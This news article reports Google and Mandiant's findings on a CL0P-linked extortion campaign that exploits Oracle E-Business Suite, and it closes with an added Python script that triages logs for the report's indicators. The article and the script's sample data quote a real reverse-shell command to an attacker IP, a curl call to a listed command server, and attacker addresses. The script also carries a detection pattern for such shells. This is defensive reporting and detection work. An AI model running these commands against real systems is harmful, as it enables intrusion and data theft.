Cryptopolitan, October 10, 2025

Google reports 'mass amounts of customer data' exploited in extortion campaign

Google has reported a large-scale extraction of customer data by bad actors that it says are engaged in an extortion campaign. Google Threat Intelligence and Mandiant tracked the exploitation operation to attackers who may be associated with the CL0P extortion group.

Google's Threat Intelligence Group (GTIG) and Mandiant have disclosed an extensive extortion campaign that exploits vulnerabilities in Oracle's E-Business Suite (EBS). The campaign has resulted in the theft of large volumes of customer data. Google said the operation began on September 29, 2025 and involved a group claiming ties to the CL0P extortion group.

Google and Mandiant reveal zero-day exploitation

According to Google's report, the attackers sent a "high volume" of emails to executives across multiple organizations, alleging breaches of their Oracle EBS environments and threatening to publish stolen data unless a ransom was paid. The emails, sent from hundreds of compromised third-party accounts, listed the contact addresses support@pubstorm.com and support@pubstorm.net, which had previously been linked to the CL0P data leak site.

Google and Mandiant's joint investigation found that the exploitation activity dates back to as early as July 2025 and is possibly linked to a zero-day vulnerability that is now tracked under its own identifier. In some cases, the attackers reportedly exfiltrated "a significant amount of data" from affected environments.

Oracle stated that the exploited flaws had been fixed in July, but later issued emergency updates on October 4 to address additional vulnerabilities. Oracle told its customers to apply the latest critical patch updates and stressed that staying current on all patches is essential to prevent exploitation.

The CL0P extortion brand has been active since 2020 and is historically tied to the FIN11 cybercrime group. CL0P has previously targeted managed file transfer systems such as MOVEit, GoAnywhere, and Accellion. Those campaigns followed a similar pattern: mass exploitation of zero-day vulnerabilities, theft of sensitive data, and extortion emails weeks later. At the time of the report, no new victims from this incident had appeared on CL0P's data leak site.

Complex, multi-stage Java implants

Google and Mandiant's technical breakdown shows that the attackers used multiple exploit chains targeting Oracle EBS components, including UiServlet and SyncServlet, to achieve remote code execution and plant multi-stage Java implants. In July 2025, suspicious activity involving HTTP requests to /OA_HTML/configurator/UiServlet was observed. The same activity was later seen in an exploit that surfaced in a Telegram group named "SCATTERED LAPSUS$ HUNTERS". The leaked exploit chained several techniques to gain control over targeted servers: a server-side request forgery (SSRF), an authentication bypass, and an XSL template injection.

In August 2025, the attackers began abusing another EBS component, SyncServlet, to create and execute malicious templates inside the EBS environment. The templates contained Base64-encoded XSL payloads that loaded Java-based malware directly into memory. Among the identified implants were GOLDVEIN.JAVA, a downloader that retrieved second-stage payloads from attacker-controlled command servers, and a multi-layered chain dubbed SAGE, which installed persistent Java servlet filters to maintain access.

After breaching the system, the attackers used the EBS account "applmgr" to explore the host, collect network and system details, and install more malicious tools. The attackers also ran shell commands such as ip addr, netstat -an, and bash -i >& /dev/tcp/200.107.207.26/53 0>&1; the last of these opens an interactive reverse shell to the attacker over TCP port 53, a port that egress filters commonly leave open for DNS. The IP addresses 200.107.207.26 and 161.97.99.49 were identified in exploitation attempts, while 162.55.17.215:443 and 104.194.11.200:443 were listed as command-and-control servers for the implants.

Google has not formally linked the operation to any known group, but the campaign shares similarities with FIN11, a financially motivated cybercrime group previously associated with CL0P ransomware and large-scale data theft operations. Google also noted that one of the compromised accounts used to send the extortion emails had been used in earlier FIN11-related activity.

Organizations are urged to inspect the EBS database tables XDO_TEMPLATES_B and XDO_LOBS for suspicious entries, especially those with names beginning with "TMP" or "DEF", and to block outbound internet traffic from EBS servers to prevent further data theft. The two organizations also recommend close monitoring of HTTP requests to endpoints such as /OA_HTML/SyncServlet and /OA_HTML/configurator/UiServlet, and analyzing memory dumps for evidence of in-memory Java implants. Google warned that CL0P-linked groups will almost certainly continue to dedicate resources to acquiring zero-day exploits.
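The indicators above can be turned into a first triage pass over web-server access logs and a shell-command or audit log. The following Python is an added example written for this article, not code from Google, Mandiant or Oracle; the combined-log-format layout, the one-command-per-line shell log and every sample line are constructed, while the paths, IP addresses and the reverse-shell command are exactly the indicators the report lists.

```python
"""Triage helpers for the Oracle EBS indicators described above.

Added example for this article, not code from Google, Mandiant or Oracle.
The access-log layout (combined log format) and the one-command-per-line
shell log are assumptions, and every sample line below is constructed.
"""
import re

# Endpoints the report recommends monitoring.
WATCHED_PATHS = ("/OA_HTML/SyncServlet", "/OA_HTML/configurator/UiServlet")

# Addresses from the report: exploitation sources and C2 endpoints.
EXPLOIT_SOURCE_IPS = {"200.107.207.26", "161.97.99.49"}
C2_ENDPOINTS = {"162.55.17.215:443", "104.194.11.200:443"}

# Combined-log-format line: client, ident, user, [time], "request", status, size.
ACCESS_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# bash reverse shell through the /dev/tcp pseudo-device, any host and port.
DEV_TCP_SHELL = re.compile(
    r'bash\s+-i\s*>&\s*/dev/tcp/(?P<host>[^/\s]+)/(?P<port>\d+)\s+0>&1'
)


def triage_access_log(lines):
    """Flag requests to the watched servlets or from known exploitation IPs.

    Returns one dict per flagged line with the reasons it was flagged, so an
    analyst can tell a hit from a known-bad address apart from an internal
    client touching a servlet that is also used legitimately."""
    findings = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue
        src = m.group("src")
        path = m.group("path").split("?", 1)[0]  # drop the query string
        reasons = []
        for watched in WATCHED_PATHS:
            if path.lower() == watched.lower():
                reasons.append("watched endpoint " + watched)
        if src in EXPLOIT_SOURCE_IPS:
            reasons.append("known exploitation source IP")
        if reasons:
            findings.append({"src": src, "method": m.group("method"), "path": path,
                             "status": int(m.group("status")), "reasons": reasons})
    return findings


def triage_shell_commands(lines):
    """Flag /dev/tcp reverse shells and any command naming a listed C2 endpoint.

    The recon commands from the report (ip addr, netstat -an) are too common to
    flag on their own and are deliberately ignored here."""
    findings = []
    for line in lines:
        cmd = line.strip()
        m = DEV_TCP_SHELL.search(cmd)
        if m:
            host, port = m.group("host"), int(m.group("port"))
            reason = "interactive reverse shell via /dev/tcp"
            if host in EXPLOIT_SOURCE_IPS:
                reason += " to a known exploitation IP"
            if port == 53:
                reason += "; port 53 is often allowed outbound for DNS"
            findings.append({"cmd": cmd, "host": host, "port": port, "reason": reason})
            continue
        for endpoint in C2_ENDPOINTS:
            if endpoint in cmd:
                host, port = endpoint.split(":")
                findings.append({"cmd": cmd, "host": host, "port": int(port),
                                 "reason": "contact with listed C2 endpoint"})
    return findings


# Constructed sample data. The first access line, the two recon commands and the
# final ls are not flagged; the other lines reproduce indicators from the report.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [03/Jul/2025:10:15:02 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5123
200.107.207.26 - - [10/Jul/2025:02:41:17 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 200 311
10.0.0.7 - - [12/Aug/2025:08:03:44 +0000] "GET /OA_HTML/SyncServlet?x=1 HTTP/1.1" 500 87
161.97.99.49 - - [14/Aug/2025:23:59:01 +0000] "GET /OA_HTML/RF.jsp HTTP/1.1" 404 210
"""

SAMPLE_COMMANDS = """\
ip addr
netstat -an
bash -i >& /dev/tcp/200.107.207.26/53 0>&1
curl -k https://162.55.17.215:443/
ls -la /u01/app
"""

if __name__ == "__main__":
    for f in triage_access_log(SAMPLE_ACCESS_LOG.splitlines()):
        print("ACCESS ", f["src"], f["method"], f["path"], "->", "; ".join(f["reasons"]))
    for f in triage_shell_commands(SAMPLE_COMMANDS.splitlines()):
        print("COMMAND", f["cmd"], "->", f["reason"])
```

Both servlets are legitimate EBS endpoints, so a hit from an internal address is only a lead, which is why each finding carries its reasons instead of a verdict. Treat this as the log-side companion to the database check on XDO_TEMPLATES_B and XDO_LOBS and to egress filtering: the reverse shell in the sample leaves the server on a port many firewalls leave open for DNS, which is exactly the traffic the report's advice to block outbound connections from EBS servers would stop.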
